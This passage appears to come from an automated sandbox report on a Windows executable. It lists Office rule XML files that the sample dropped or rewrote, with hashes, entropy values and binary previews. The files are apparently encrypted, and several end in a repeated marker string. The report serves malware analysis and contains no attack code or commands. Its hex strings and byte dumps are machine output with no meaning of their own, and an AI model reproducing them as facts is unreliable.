                                                                                                                                      SHA-512:855C427E70FC7086B6A18468C98D52C5C5DE0DB97F737897104911489EE513C6E3E4A68A20798F4D02D0CBB94183F3929850522FCA16B5A3F394D5F8DE786711
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.y..V.R.l.Fp^%9$w\M.*.G6.....@...z...__4B...7.e.5].....m\...,x....y.!.7.e..d..v..r....~G.X.....f...8A=>.....F.Qj|....\.yM.......T NF.p.9Z<J...,.....(&<;.......2FK.w....@.VL..\../.....a.....6.x..U.2..V:.s...W....=..pK......O+.=..Q.....u."..%..(..P.V.u]w.Q......A...9..g1...c./pZ..v..........d.(.X.0.q.M..Y./..]m..x@..x@.<...G..S.W/..N..2.o\..%.j.......p.8.S.P.z.#EH.=.$YP..p..Z7#..H:|R.*G..[}9....s.$....b. F.U.R.P%..5.a...%...g.M. .....zH.&.0\.x.Q.IS={..)C.<..2....j./Rq%v.K...L%....9|.......)K...cJ...o8( .*.....b.lx.O|.....e....y..4OaQ>..P_.7....K......p.ib.g!..l..|#....o7.-....wYs.e..a9J..w..Z4..../..t.'.wd.[.L..r..0.J....P..).jY.N.".4.#..lF^.;.,...W....$P...6A.](..ltp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224011v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1333
                                                                                                                                      Entropy (8bit):7.835017017123923
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:KFHFbpOEGdwqDBLr/F+al9Lj8Vkrx1DhDgS99ibD:KRB4Bd3Dp9/119gS9GD
                                                                                                                                      MD5:4675C7AAD1BFD8B751D34227123C94E9
                                                                                                                                      SHA1:8A4CDA7045FA286FCEDEE30DFB7BD4B5A65E1239
                                                                                                                                      SHA-256:B6BC0E186A053C6C77321D3A887CF2DEE9BF9436D460876A0DA09D44BA7C2457
                                                                                                                                      SHA-512:25B8B16BA3680A0C1643EA568C1225CDBC2FEB479DD79E7D272D544FF41902D179A88CEC7065D35C02FE5565392EE018EF2BBD51DFB80E8099FC5C4D27B459AB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..rW.<.iL...p3.."......|..cJ.........%..m..U."M....Q.......G..]l...B.Qh.X....z..*...........6Y>.^..fEAx.#\M3.;....YQ:&@.c.o..z?..$K.x.'....a.~.|..=.b^n....ai....Du..,wL.;.t.T-.....yh.f.......%.T.........Y...'...\...G0.....9..q.....-..i..s...=.:...B.O`...F...(.Oa.KR..%.........W.....$h/.7..,.l....Y01.(.L.D....:.?k.Y..S.F.T. %..&.}]..N)..n..X..S........._..u..Pw.;.....@9.M.Yx....}........Y.Nx.....-].e+m..K........M.-.u..i......[......4..{&..I..&?.{.0.....F...;pn..3X...........u8.....D.us....s..E...~.g.Y.L.uB.}D.&.K..E..$....\..7....v.J....J..b.h..'.|z.I.1.~?..^..1...|&.t..Z.........R#.*.5.3E%O...C.g.....S..n..5B...:Jf.V}.v|.u...^...>DvE.....Rp....cw....W.b.In.*.sai......._y.....n.g.~..Es.F...5(..AD..3.....#tS'J....Kx.k............P.`...l.....;.?..0*....x..0m.Pn..].N..TDD.../.'...Y...F%...EX.w/.......^.M.z..t....=.&R.....Z...1\. .8.J-L.....u2...TTs..%tn,....{.p...q#'..S..|.......P=SD.]..Z.!B=.D.7K{"........Q.]...~.<.Q.x<.Xg..A.g....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224012v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):761
                                                                                                                                      Entropy (8bit):7.733287688177157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:IXfEp5F64xenpcbgVqXgjVWJPPpp4M0+6lIgbVIBYukIcii9a:IMp5Fr6p/WdBpD05/+JbD
                                                                                                                                      MD5:85E4E1A8CD42726E3A4EF1768D42A23B
                                                                                                                                      SHA1:48F1DBC477527E463DCC30546E0A57C527D0BBBF
                                                                                                                                      SHA-256:106C9AB2B73794AFAA61818DC3CCB558A061F1141666F8780D604DC2EEDB72FE
                                                                                                                                      SHA-512:B93124F982D4C3FAEE87177F6692D3160918F2966FFBB8E89973B12EA6EDA33B351AE504FB55B4C74DA0C1DC669121911B4C6AB3C483D33D6C3E772585017EF4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlu....n...<._...`.2........*.B.wa.r.G..m.YI...........c....By..].Cce..uTBo5............2;..."kj`.{....D=.c.Jo_e.3.....Cq.e[.o.e.4KP..Q.<..9...e..H/...&*!.3.G;)P...\.<..z.....6.1E.r.J.l....0.w..Xh..*...y..f./z.Z9u. TA.k...B.r.[W.i=......I..>c.Os...f...L`...m...*....3.z.\.&.G......O....(9..n..u... .m.ch.<">.>......N...U.p.?.:....A.>.b.(.vv.U".]......t..3...-P.O-x{o.....w.Rq....3.)...M..(,).%;]..G.N.Pio..C"..y.....k.*_dW.>}...y..g.....@..}......u.@.h#...1^..:.k.....1...<^...j........./.Y ........-.0...}...@....d..i#d.N.w..H.~..B'....../..V.c...sg....g1....x<q.kw.f....C$ffm..?..v..i..#..<z....-.s...O.&.x.g|.....g..GJ.."..S.o.N;5.icq...#P...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224013v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1152
                                                                                                                                      Entropy (8bit):7.831308035051641
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:kFuPGpi530zDAgi8VNn/+eoHK+KqMwJiQk1gGgAFcuUUiK3GbD:k5pi2DBmAKZhdGBIDD
                                                                                                                                      MD5:928AD0CC961A3576CFC4643B7F8BFBE9
                                                                                                                                      SHA1:1E65839018CBFD0EA12FA73CEADA780DEB37321F
                                                                                                                                      SHA-256:85579344CDEED589D93F03A589FCCCC37215E2E2DFBEE8241491A9F940B2FA80
                                                                                                                                      SHA-512:0EFEAA13A1F1C7B16876F9D6A16AE118A34D01FE07BEB5CC0F8634429DEA4E2968A8F3551D0BC745739299AA9257F033C3CB91AF94199C76866B7B5D96E67FF5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlS.t.>@/.P.....\..gD...3...!..lh<C..r.U..M.E.N.4....I...J.n.GN...$w3..x./..ic.s4jM.=+=...a-4..F<.6........&.....p..$..x......e..#V?..2d....2...v.A.q?.bmv......}.#..n..R.3...(...++..CM0[.ok..*mA7..'.......!.>tM....N......A.e........9D..l_.L.8.nT.N.(.rm.../g.;...M.Q...)7..A..Nd.[....r..y.v...x...:.#.iH9.C..M....x.?R.~.............GTw.\8.U.......?.|..}..o...r0KJ..t..br......2..32.P.\d.Z..2....F...uL.X..I.pE`..A.._.../..c.P..'.f...Ie..1M.C,/.....!..n`.ct....[...x.....D.t./._+y.}..!PG~p.P.\Qa.W.....@^.......)t...b.....<3..~#h...#h.....%.....s.g..z.Sk..5..&;/ .jM-<.RW.t<.?..`d..s.v...].. .!...h....o%.....%.Q~...l.w+(..Z....h`...c..c&.....XKsB9..G..,8....2..i.5t...j0."I...b.....w....Q....C../*... .!P.E...Q..z..@h.....H....pg{E%.k\..n;....2v.y....[.q..[..........;.x...O.`._........x.y.....\.RE..).I.b&.8a..TdhW..|...Z...5|..d.u.$.\....1Sl.U.......Z.A..!1......c5..#g..............*.hv2.........Z..6....E......4..z.=.#O.@...B.*@_... ..!.; a.....z.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224059v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1600
                                                                                                                                      Entropy (8bit):7.86504229157548
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:LhjKFTlwTotGHYppIdUxfzO/Ucss1LSMpHz77D:LgFhwL4lJO/U0m2/3
                                                                                                                                      MD5:51F2464F614481A043A473911A8DD246
                                                                                                                                      SHA1:00D148C7B441601CEDA612D01DADD01A63A38961
                                                                                                                                      SHA-256:64B5B06BBD8051686938EE823D8AFAF03D7FB6439B9EA9243C37AFD83FAB55B8
                                                                                                                                      SHA-512:99025534F55410EA9278BCAD48ECFB80CE20A9BF3C99DB23AC89AFF5F56A68F9552646C4F848216CD67197955444938901CDCFAAE21B572CBB91731BFF4BBA95
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..x..$.......F..0.....~.}....-r%.W(\}...a..)J0.X.s_.=7.:...`bBy....6!o...d....(....J]...l..".l.h.C.g.y...5.;..i.|L.?|..z.3......c.Z.=...\.;.l..r)....l........-..1......."=J.r...+SE..s,a....M.~.bcY...N.@.U...}....G..N2...O(..t..F....D_.t.|..K...:ZU....Ddh.n.wE.@.v...j.....k.FB.......t.!.+..mC8..U.9.eT4...C..B.U.l_.J....c.z.."|.g.(}<<...7.......j..1..m#...;vd.Ae.I...F....2.8..$..u.mA.T....{..4@.j.&.v-`P$J.|....H.?.....x...."...$.Q.3a.....?"..)."!.<U.Up0g.As...e......>..A.....g.u.oM{.....M.....)..B..x!.w.....H ..*/..?.....y:K8..IC...X,..vl......X I6I.`R..k.}...Uig...$#ewl......U.B...~.....m.j..7A..M#Kr....#Z-...6.L.P5......*..y7....v.......sq....p..g..J.....P...'..J/.n/......"I.....q`.....KY.D.j.hrAw...R.w.z..aL.{;.A..................g...dXM..S.,2 .....BA.|.......o_Nc.&....f.)R.h.DR.....cH.\...[....f.W....u=...hb...B$!..a-J;...oP.r..?./..7.e..@...........(..v...hc.2..s.wp..0.....`.u.A.j.../.... .)],...+ .0De...Y..m+.B......o.C!g..8..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224060v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2578
                                                                                                                                      Entropy (8bit):7.925411931580695
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Cdtxc9kAW5bpr230E2xWE9pjVb8d2I5V8OK6MZJ0HH4K3eCuK2D:itykASbE2ZDZb8Rr8OKZ76eNv
                                                                                                                                      MD5:F8F6488535993BCE91CB14B0391F121A
                                                                                                                                      SHA1:0C9E9452BA52AB0C4F63ED607F553DA56E28C9AE
                                                                                                                                      SHA-256:4814F291B6AFEBE97236CD386DDB628FD9A6CE96CFB8BE10C9B8B0137535F16B
                                                                                                                                      SHA-512:32778467B0F9A15E06D6FEAF59A5D00010E63AA318879F71432273A58DD18F5E4605C208C02E27FA2637455C4C378E05648B83ABD817694E32DFF901206322CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml+...S.....G.....2...B.....-.&.f...=.o.B.#.Jd0..1I...]..T.>.....b+..c....C..}c..?_..qV.O.,P.Y..^\.d.......^{..].q.X>.%..A.....h!H..$o.F+z.....[d.|.qH...a...s|..69..o./~.Yl.o.X.'+`.=,}v.`Fz#...8~.O..c_...{c.........1.s.Dl.c......I......-B........+..dk%..q...m.j...?.....ZM.n0h.......A.T..).....++...]r.6.~{:...Re...e4..b^...S.0....'.c.O. ...X.:uA.....A;td.{....U...m;.d)&.0Vl/.G.z..vn..G....../.....c3..O...Y..y.}M...-<.e.k....'.]i....h..n.U..F...h...s.~.../.=..../:.!..U....K.o.j.Q1.....Mp..B..S=...............8.4M..g1..>P..c...pd..X;.8...!.....F.k.7...b<t!......=>/..UM....&....(......gcqfs6...#..+...D.....S..R......90z...(0..^.+........D..H.o.......Vs.....Y~..9@..].\H..]hf*&x.*'14.oLXikb.l_H.S.......l../.....#*...kC....w...b(.b.E+^...~.D...Ff.f..'^H...d(..b..[s#.I.M....W-..~..r..Q.aQj.8`[s.OO...l.....Z......L-..t..4E.Um.<.t.+....../....&B..7..A.Y .:8.R.......b..DR.L.....Lf..........0+....-.....qlV%[....ov3......f.CU.T..T.4....>

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224061v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1846
                                                                                                                                      Entropy (8bit):7.898933416965334
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:pW5Kbf9Pz59nR0P7t6HZcCM+g2WVFh8W1cxUD:Y5KbJnnR0Tt6nU
                                                                                                                                      MD5:B3480DD9F0523B61142E8A3A22F50C1A
                                                                                                                                      SHA1:73BC17EF777F90F9B14BA51D2C733B0D6CFBF43E
                                                                                                                                      SHA-256:67E72C07C04C645D7E9987D8098C7729265FE88D32BEE1D667133183A080D00C
                                                                                                                                      SHA-512:6A4FA1ABCDEAC79E41CE05163CDBC9A8877F5A6C1E8653CC74403F0C8C06D691AAAC665C17BC96A20CD7C382799384F5D1020D73AC9C52727A90971218148EC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.=.(.'N....p=.w.......^./.ch~E..z.@....-......'CT.WT.`&.`.....C.5.O...zA...Ek...Z.._t..K..d.....Y.]E....N....c$d.../.-.qo,.%R.+?l..c.+1D......dX....<...6.3.G.`..}..7<c2..............(_%.G..1.0..A..a.a =`Qpj...7.. .f....9..^Em....X..I...S.9.(...1y.F..2D/.....p.CP..:g...e.'.n.N....&j.w.....B...;.1....z>.....dd.3..;..v1.i...q...(...Ll.....K:..>}k....#.>.7.+..4Q3..Q......U..X....a.$....EgH.?fF.'...6Zy..%V.....N......S#.<.bVs.Mt..`>.9...){.f!H...,...0Oo+..e....[K.u......s: ...<.'-~W.W....F..5.I...[..~....Y.U.m....Q._..h..n.R..B.fk=.....<Z..........8.,qQ...........J..t.3....g..#:..b.I.....K..... UK.2~...Kr+t.....9.e.~4V..G.. ;#.....#....%7..... F.P.{.$+.k..'..F"~.W.`...L.wNax.C..\.=.........3....g..Q3/9jIs.-^.....r...\....*.C..9.....HLo...^..#......T....Pg.0..p.b.ks..J....2..@.#E2...`.%NB.\.y.).-.$...\pd..,.F......r[......6..E...=.. ^oH..`...C..]SB.q..D..\.z..YO.....C...-|..I......n|....}... T.X..yIvf..9......@...t.`xw..Y...:.....q....W3J.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224062v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1193
                                                                                                                                      Entropy (8bit):7.817943286455799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:hNSIXQrlo7fiNPMM9HgMGJnCxUAsu4t8bcbRcdDdzt7XJRmZ6IIKdMCmTzbD:iIAry7QPMM9HpRx4u4t0zJ7fPHKdMVTD
                                                                                                                                      MD5:9BDF056995A1C6947F43BEC304D64C7A
                                                                                                                                      SHA1:480C47A94873F3877632C75EA16E7FA757345D5B
                                                                                                                                      SHA-256:3C3A4B96E8E2EE0B9D4728E4B3A7D16DC726CABF949C70A7C2C13C8D5A0A7E22
                                                                                                                                      SHA-512:B3D28AFCFF4ACE3BBBD041BC042B865B1FC9DA901C0AD6CFE71758D8A371E4E29E8F91C14FCF59369037AF537A9B86B95EF389D631FF0BD69436532ADBD0AF82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlN.c)..h.MuHOP.....X..g>..vc...;...(...J........S.3....^..Z.xa..k."..6...p..._16B.yC..;....Jj.TT;Q;o..%.Q..y~...-.$%y..G.F.kb0X.9.{A......)dO..o~....H....l..(.sg.......wg.S.....a..o....Md3b.vM.I+.yJ..$n.._j{Qq.YM.U....o..W|...X.....R.1..);.K......f.F...,&d..V.|....2G...i........Uw....f......0.(n4%..9.d...g1..%.gxU.\sX.r..........4/..f*.X.......V..3..S4l...s).h#....W......;...]._i...<.//.b.E+f...;+?...u#...\PVHd....}.AC..W.5F..M...n..K........4g9..|.;.`<7.}.dW....z..Hy...bb.......Y...<H..V.*.w|......Z7c.P.N..#h[.q..L..z.u..I+.....3^A.......6..^.aQG.*]*.g+..}.+8......$.W....R..K...0...g.@.}..>.KF.NXI..}.S..M).....xy[...~.xh.K. ..@.*D..F...E*.x2.a... .....@...gbm...{{.p... ...3..!..{.m../.+s..se....fw47.....y3..'..j..z..\,.t>C..*..vO,..qz..(..u.&rs.*R.]...8..i.}..b.9.f..S....+o.....]..o.7.".Sm.k..^.. o... W{U.5._...D....V.F._.6....l;.....W.....&6.Ls...0dR.......z.....P..8..d1u....}.j..U9..W..}Y.,...[.8._...;......@.._.7. ....+a2.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224068v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2371
                                                                                                                                      Entropy (8bit):7.911404502252332
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:pdMSP6H3NvAW28kfxIbagfKk8xgge0kYbxxgP7dNZXeD:nMu6H3Nvaxuf2ggemxyhL2
                                                                                                                                      MD5:07EF1C3E9DE73A453CDFA8BBE299682A
                                                                                                                                      SHA1:2C3E7192B798C721E558CEDB5B8162BDA8675CCC
                                                                                                                                      SHA-256:334AA97ECE64AF22FDD70A716738741B806CD3D5D4FAED0017988DDE0AE8179B
                                                                                                                                      SHA-512:FE8058F07E81ED8D659D2DD991582DFD36506DCB327A0C6F013547E8CA27CB4DFCA0A45EE6958EDDA4CFA1FC42F42790159D2A790D29A2710FC3AAED27686CE3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml<|.......J.M....D......Dj.{..E..0.p.._..#;.!Q.CGh..R..phee.'Q.zA...p.w.XC._B .<.6.&H94o:.[..a.kh.G.....D...Z'...98s\....yrO.z...Y.......oe.L.J..pH....y</.q/...Jx.(...;...M..U[8..........x....P.7y..o.j....x.y....B..T.......v'YOw..F......Fu(.Q....*v..~:6..T,..g%.Q.y....(j....a.......O.C.$_.../.(..g...=Hk......e.....d..R71..w....g.X.Y\..p.../."...2..<.].....(6...Uan.........x.Wmg.(x....x.....3.m..9n+.cAT....I.&...[..'.K.....<.L..n.Wv.#c...NJ..(h.i...C8..sU.........s...{....Tp.k.G..l.G.W)t ..1.D..W.t..S..L_f).i4o.?..m..u?...1..k+Epg.f....;..v.......[A..Yv=LJ.co.g..`..8!.."..E..I]J.UB.g....C..l......P.G#{.).:^....`:..c....`..w.....'.;5...."9.(2~rT...\+.6...........j.\x...+M.q..L.A.0.q9.. ...T{..k...Q[.2.H..z.7.p....v$..E:.S%%.o.*P.j.'.....&.`.z.{g..;XF)|..V.......$..Hx@.....M.D.o...l...T.A/..<.0.....E..`....x.F.Y...v@..y`.+.....!!.E...#E... ^.Q1..).DSa..7@r..*v.a...T.....0g.?.,n...[..NG.o.<.g...!R|.!..a"y+M!L.+oY.n..........5'....=E&.Ko8..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224072v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753
                                                                                                                                      Entropy (8bit):7.697033831435714
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Qr68DOIFJex1Xxo4YCxqqxKuo6GNhl8sk9CZ5mycYwZyTWa26Npqb/sW1Tsqywb5:QrXDOSqBoIxqqxQzND8skEZ9GAWYNpq7
                                                                                                                                      MD5:7A0F151740AC0FCE758F95A7EF451CA3
                                                                                                                                      SHA1:3E0723C4891FF245B15CD614A5B00E1F02011B22
                                                                                                                                      SHA-256:B407D2CB788404D4273858583A5E140C0F97735E51C6A787C7713BBB9B5B859E
                                                                                                                                      SHA-512:CFB7A78CCDE62D67860A4E2A618464E8028C75542AD142140AE7869B53BBB80456A3C29ED59F6F967695CFDCEC053202B6522D24BAB89FD214EB5D769F58386C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlVq...L.l/..rNTV.Qx*`.~.H..c.....x...7.Y.. ..R`Y...`c.......-..9.T.~.......p..........C..$.@F.3~.ABeY.z..+3+..E..q......t.xlu..K.Q@..Z.......$...Z..c6 .70.GZ..mr.Q.*..{.!^........N*..x.*d."(./.EF.c.J.k.9.q.xa.j...J..j..J...F...>.8.C....\.y..>V...YuR>|...#...D......\.Z.........8.......c.Zs.=U...5....j....jLQq....:O..5.j7.*z.T...._.[.c. ...K.M.w.....2....um|.F.....O.W..U0y.vo<.k..1.<.......s...T.}i1....g.TJ&x..Sf......w/g..$d...4..........Q..........f.....8o8..fWh.......N+].....7......v.2.[...r....!.........g...5."..IV\.........4..e..(Og......X....%*.m.(...I..S.\.#..'...l.y.cVF..i.\. xC..E#..^D..ndf.......>..XD.".Ftp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224073v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):816
                                                                                                                                      Entropy (8bit):7.722556467950248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:kk6coI6wnIBhITLGIQmRndkiNyVb11nFa/zZqFX2ubD:kpI6qxvGbMndkigd118lqdD
                                                                                                                                      MD5:257AD05DBC14B9BBDF12877D54EBC385
                                                                                                                                      SHA1:AE005D405641BB14F5C91B89EC6814F29397EFA3
                                                                                                                                      SHA-256:0BBD0A9E5E09A75EEBEED4CF8C51C27C40D462BD4059E9EEF12E4E1A2048A8B8
                                                                                                                                      SHA-512:A218E8BEEB217D8C86C29E7F05BEF55253F4E6C354B040073E1B0D1478BA59EEEEFA20FEB28115686EA153048CA636C32D1E0FAD7BE4442BBEA95680EA85310D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml6...r0o..}..].|"4...-.!..F..n-.p=.E8d.$....}...V.c..)..+...%m.Jt...D......P,.A.'....a.?m@m....a..n.5KrM...T.l.b&.f......?..y...s...U).d..Od...m....L..a..ZH.<..Tx....`..>...........}+.N.>...}.-.+..........QX?......A..g...\.7..{...-s..%..\..n..._...%.... ...R..a.r}=J....e^5.D..:..Bi...b.:uYVhy..C5m0L...G.{.Undg..Q..".....).uk.#%[@....Z.q....<g|.=6N..eY..F...K..p...b.?..p.p.i....$...s.Gb...c.....K]...2..{a....?..;sE1.TD....v....s...0...|...s..'..@DX....kI.\b.....G....d.:..^H:.[...7..^{.*.....}..k......I...N.GP.\dJiw...%.0._....m....I..y...r...o|...?...`..rU.f.b!.Z....r.c........G...Z.....$r.{......X..h..k..Z7.az.!...jG.V._m/.E.$m..y.o.PC..T..\Z9.&..|v1b..t....%.`..9M..(c..>Z....C..3.z..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224074v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):816
                                                                                                                                      Entropy (8bit):7.749825130890165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5Xp1u2DFcnsPUDaI4oD4J1zeVGIxi1cyb1x0RKHbD:Ji2BcscAmvfxi1L1ORED
                                                                                                                                      MD5:18ECACAA250B5EBE64D24171F7CE1E82
                                                                                                                                      SHA1:ED1D69CA8D7C87DE291B4F6C0DF6C550891702A4
                                                                                                                                      SHA-256:08C435DEEE87AD4E53A61927D99AA73AC53E1B9873F0E6DB33E6CADD78D20AC6
                                                                                                                                      SHA-512:1CCF8D989B3DE05E14191C0BFFCF473955892F372FF77243BD891B72E77A761C2436849AABEC4A90368D37BAA7721A91B45E2EE8EBBD081745535C763CA81AD2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..<.;D.z.|hi..r.EK...?...5.d ..Gu...P.fnw..q.PC..k.......D.8v.V.d^....}...B.?...8?...T...w...r<...H_./5.k.%MdD..Yu.p|ENT..+.c....n>.9._... t.....nv.x.s..E.....~;.$......+).....B..........P...y3.]-.YLS..t.F.wN.]Z..0D......*.......M.....q.>^d...=Q..(..c.dN_....-...M..3.g.M....aB[*j..\.Uw....dV....l.. ...I.. ....../.a.D..`..T..:.~.E.=...Q_..%..~V......l]...H!.>.G.F..},b."9t)u..b&........!..d.....-.k..K.nj.'^1r..A.4..&9MA!@}\.v...P?#...[....!@.....<R.,LLm8..4.h....|U.0F P.K.....lWAc.>.Zm...R!.K...9w.R|..*...c...n.2.7..;...TA..g..9.....B...}.*].D].p.F.6.3{.JEn.'...N2\5....G.W*..{.\.....k.}.m..;1......O/.p@{%.#D..X.w.&.r.;]0.<a.........s.n..(..F&s$_..?...S.m..../!.."...../.M..^r.<.z..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224075v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1494
                                                                                                                                      Entropy (8bit):7.863656085714814
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rItaaj3VVKPGRFMIuQBfrP4xEDjfNO4b+ka9ZrOmr4igLCnbD:MtaYyGRFMzsfrP4eXNOhtqXCbD
                                                                                                                                      MD5:466BD44DA357F464CD9D2E70D476E5DC
                                                                                                                                      SHA1:54C33663C7B375B541F581CB18C43C0B1AB2D22B
                                                                                                                                      SHA-256:1B7DF2EE697454485B879E92684B513D4EF93017BB06A58FBA3AF432A1E91BB2
                                                                                                                                      SHA-512:4FC478A8C9354FF5DC9CE1552B9F076E2DA291D58C8383F3E2FBE4EA602F81C9E8E83E01E0328A2A9BBBEDBE235793895D0D188F2F53E0F6D57F324717954F47
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlR.:.r...s..d..z...xFX?..a.....~..&<%.(.t"K|..[=.....3.. .r.x.S1.n....#4..y.....bw._C.G*....2....q.|.>.;....t..]p......z.Rw..G..p.9Imp'.()/....-N.0.yz.g"s...`Y")L-.-.....U.b.*Dqu^...A..Uc....."..#.....8`../NL(.!...4Q..'..~&...$..~`v]+BN.....L...Z0.x...f....^;+....Z.|.-bXc,...M..../wK.....t..T...X.q.g)4K\.&......*.F.ER........m../..R.1.`L...e.c./.......9ML.p...]..+up[q.o65i.i&..PD....[........Y...\.@..c...<&..Ni..:..F....]IMQ.)t..D.$`.M<.nw.s.)KI..e...D8>.V.....4.^9$`.}.%..}0|.s....4.&#Q[1.F.C;...|... B...U.e......1..E&.O....rb..j_.P.....rF.]....~Y....2&p..,.s....n.SC..OI....$.;.?y\...h.(k....$(.$...O...&.]........HT.qM&.B.I..._07.......D^..P.47l...;.."b.{0...3j...y....[.q.....}:.v..NZ9.M......`..fO....A.o..Ml|=}c.\...=...Q....+..`.=.w....<..A...[.X.G...h-Mm.#..M.v..fx.A...+.P..}..2...d/_..L...<~).@v.TK.....F.!]...~z..!......gU".W...!...M|Kp.}J.Qy L.W]8.."+...............G#s.T".Lq;..,:.....k.].3."+....E.":...|........=...t

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224082v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):838
                                                                                                                                      Entropy (8bit):7.736652482188982
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ASgmnpuumzMh1gq395WNvsFgMd/LLT90g4tvbD:6mnpjxJINvGgMdjLublD
                                                                                                                                      MD5:F25B13B069B49EAF2C92D9D9C4E82A64
                                                                                                                                      SHA1:3A4CA57D2EA3D1ED8B80AE805D2821CAB5591D1B
                                                                                                                                      SHA-256:62CDF2E13929B5CB785A72931A2E4F9F767F92953D0CB2B348C06ADD6516522A
